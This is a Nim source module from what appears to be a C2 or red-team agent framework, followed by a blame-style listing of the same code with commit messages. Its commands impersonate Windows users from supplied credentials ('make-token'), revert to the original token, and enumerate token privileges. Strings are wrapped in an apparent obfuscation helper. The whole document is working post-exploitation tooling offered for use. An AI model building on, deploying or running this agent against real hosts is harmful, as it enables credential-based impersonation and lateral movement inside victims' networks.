src/modules/token.nim

import ../common/[types, utils]

# Define function prototype
proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult 
proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult 
proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult 

# Module definition
let module* = Module(
    name: protect("token"), 
    description: protect("Manipulate Windows access tokens."),
    moduleType: MODULE_TOKEN,
    commands: @[
        Command(
            name: protect("make-token"),
            commandType: CMD_MAKE_TOKEN,
            description: protect("Create an access token from username and password."),
            example: protect("make-token LAB\\john Password123!"),
            arguments: @[
                Argument(name: protect("domain\\username"), description: protect("Account domain and username. For impersonating local users, use .\\username."), argumentType: STRING, isRequired: true),
                Argument(name: protect("password"), description: protect("Account password."), argumentType: STRING, isRequired: true),
                Argument(name: protect("logonType"), description: protect("Logon type (https://learn.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types)."), argumentType: INT, isRequired: false)
            ],
            execute: executeMakeToken
        ),
        Command(
            name: protect("rev2self"),
            commandType: CMD_REV2SELF,
            description: protect("Revert to original access token."),
            example: protect("rev2self"),
            arguments: @[],
            execute: executeRev2Self
        ),
        Command(
            name: protect("token-info"),
            commandType: CMD_TOKEN_INFO,
            description: protect("Retrieve information about the current access token."),
            example: protect("token-info"),
            arguments: @[],
            execute: executeTokenInfo
        )
    ]
)  

# Implement execution functions
when not defined(agent):
    proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult = nil
    proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult = nil
    proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult = nil

when defined(agent):

    import winim, strutils, strformat
    import ../agent/protocol/result
    import ../agent/core/token
    import ../common/utils
    
    proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult =  
        try: 
            echo fmt"   [>] Creating access token from username and password."
            
            var success: bool
            var logonType: DWORD = LOGON32_LOGON_NEW_CREDENTIALS
            var  
                username = Bytes.toString(task.args[0].data)
                password = Bytes.toString(task.args[1].data)
        
            # Split username and domain at separator '\'
            let userParts = username.split("\\", 1)
            if userParts.len() != 2: 
                raise newException(CatchableError, protect("Expected format domain\\username."))
            
            if task.argCount == 3: 
                logonType = cast[DWORD](Bytes.toUint32(task.args[2].data))
            
            let impersonationUser  = makeToken(userParts[1], password, userParts[0], logonType)
            if logonType != LOGON32_LOGON_NEW_CREDENTIALS:
                username = impersonationUser
            return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(fmt"Impersonated {username}."))

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
        
    proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult = 
        try: 
            echo fmt"   [>] Reverting access token."

            if not rev2self(): 
                return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])
            return createTaskResult(task, STATUS_COMPLETED, RESULT_NO_OUTPUT, @[])

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
        
    proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult = 
        try: 
            echo fmt"   [>] Retrieving token information."

            let tokenInfo = getCurrentToken().getTokenInfo() 
            return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(tokenInfo))

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00			`import ../common/[types, utils]`

			`# Define function prototype`
			`proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult`
			`proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult`
Implemented 'token-info' command that returns statistics, group memberships and privileges of the current access token. 2025-10-17 17:22:31 +02:00			`proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00
			`# Module definition`
			`let module* = Module(`
			`name: protect("token"),`
			`description: protect("Manipulate Windows access tokens."),`
			`moduleType: MODULE_TOKEN,`
			`commands: @[`
			`Command(`
			`name: protect("make-token"),`
			`commandType: CMD_MAKE_TOKEN,`
			`description: protect("Create an access token from username and password."),`
			`example: protect("make-token LAB\\john Password123!"),`
			`arguments: @[`
Impersonated user is displayed in the client UI and persisted in the team server database. 2025-10-17 13:01:12 +02:00			`Argument(name: protect("domain\\username"), description: protect("Account domain and username. For impersonating local users, use .\\username."), argumentType: STRING, isRequired: true),`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00			`Argument(name: protect("password"), description: protect("Account password."), argumentType: STRING, isRequired: true),`
			`Argument(name: protect("logonType"), description: protect("Logon type (https://learn.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types)."), argumentType: INT, isRequired: false)`
			`],`
			`execute: executeMakeToken`
			`),`
			`Command(`
			`name: protect("rev2self"),`
			`commandType: CMD_REV2SELF,`
Implemented 'token-info' command that returns statistics, group memberships and privileges of the current access token. 2025-10-17 17:22:31 +02:00			`description: protect("Revert to original access token."),`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00			`example: protect("rev2self"),`
			`arguments: @[],`
			`execute: executeRev2Self`
Implemented 'token-info' command that returns statistics, group memberships and privileges of the current access token. 2025-10-17 17:22:31 +02:00			`),`
			`Command(`
			`name: protect("token-info"),`
			`commandType: CMD_TOKEN_INFO,`
			`description: protect("Retrieve information about the current access token."),`
			`example: protect("token-info"),`
			`arguments: @[],`
			`execute: executeTokenInfo`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00			`)`
			`]`
			`)`

			`# Implement execution functions`
			`when not defined(agent):`
			`proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult = nil`
			`proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult = nil`
Implemented 'token-info' command that returns statistics, group memberships and privileges of the current access token. 2025-10-17 17:22:31 +02:00			`proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult = nil`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00
			`when defined(agent):`

			`import winim, strutils, strformat`
			`import ../agent/protocol/result`
			`import ../agent/core/token`
			`import ../common/utils`

			`proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult =`
			`try:`
			`echo fmt" [>] Creating access token from username and password."`

			`var success: bool`
			`var logonType: DWORD = LOGON32_LOGON_NEW_CREDENTIALS`
Reworked token functions. 2025-10-17 18:35:40 +02:00			`var`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00			`username = Bytes.toString(task.args[0].data)`
			`password = Bytes.toString(task.args[1].data)`

			`# Split username and domain at separator '\'`
			`let userParts = username.split("\\", 1)`
			`if userParts.len() != 2:`
Standardized console spacing between commands. 2025-10-17 09:42:08 +02:00			`raise newException(CatchableError, protect("Expected format domain\\username."))`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00
			`if task.argCount == 3:`
			`logonType = cast[DWORD](Bytes.toUint32(task.args[2].data))`

Reworked token functions. 2025-10-17 18:35:40 +02:00			`let impersonationUser = makeToken(userParts[1], password, userParts[0], logonType)`
			`if logonType != LOGON32_LOGON_NEW_CREDENTIALS:`
			`username = impersonationUser`
Standardized console spacing between commands. 2025-10-17 09:42:08 +02:00			`return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(fmt"Impersonated {username}."))`
Started work on token module and implemented 'make-token' command to impersonate a user from username and password. 2025-10-16 19:29:49 +02:00
			`except CatchableError as err:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))`

			`proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult =`
			`try:`
			`echo fmt" [>] Reverting access token."`

			`if not rev2self():`
			`return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])`
			`return createTaskResult(task, STATUS_COMPLETED, RESULT_NO_OUTPUT, @[])`

			`except CatchableError as err:`
Implemented 'token-info' command that returns statistics, group memberships and privileges of the current access token. 2025-10-17 17:22:31 +02:00			`return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))`

			`proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult =`
			`try:`
			`echo fmt" [>] Retrieving token information."`

			`let tokenInfo = getCurrentToken().getTokenInfo()`
			`return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(tokenInfo))`

			`except CatchableError as err:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))`